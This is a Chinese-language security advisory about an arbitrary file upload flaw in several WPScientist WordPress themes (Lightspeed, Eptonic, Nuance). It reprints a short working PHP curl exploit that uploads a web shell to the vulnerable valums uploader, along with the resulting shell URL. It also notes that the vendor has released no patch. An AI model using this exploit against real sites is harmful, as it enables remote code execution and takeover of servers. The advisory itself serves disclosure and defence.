受影响系统:
WordPress Eptonic Theme 1.x WordPress Lightspeed Theme 1.x WordPress Nuance Theme 1.x WPScientist是WordPress上使用的一系列主题。
WordPress使用的多个WPScientist主题存在安全 漏洞 ,valums_uploader/php.php脚本允许上传任意扩展名的文件到webroot内的文件夹,通过上传恶意 PHP 脚本,可导致执行任意PHP代码。
有漏洞的主题: Lightspeed v1.1.2 Eptonic v1.4.3 Nuance v1.2.3
<*来源:JingoBD 链接:http://secunia.com/advisories/51714/ http://www.securelist.com/en/advisories/51714 http://packetstormsecurity.com/files/119241/WordPress-Valums-Uploader-Shell-Upload. html *>
测试方法:
# Exploit Title: Wordpress Valums Uploader Shell Upload Exploit # Date: 4-1-2013 # Author: JingoBD # Tested on: Windows 7 And Ubuntu # Team: BANGLADESH CYBER ARMY # Greetz: ManInDark,Rex0Man,Evil AXE,Bedu33n,NEEL,AXIOM, And All Of My BCA Friends. They Rockz. :D ALSO ALL BANGLADESHI Hacker Team..
=================== EXPLOIT====================
<?php
$uploadfile="bangla.php"; $ch = curl_init("http://localhost/wordpress/VALUMS_UPLOADER_PATH/php.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('qqfile'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult";
?>
Shell Access: http://localhost/wp-content/uploads/2013/01/bangla.php
=========================END======================
厂商补丁:
WordPress --------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://themeforest.net/item/eptonic-beyond-the-limits/241366
查看更多关于WordPress多个WPScientist主题任意文件上传漏洞及修复的详细内容...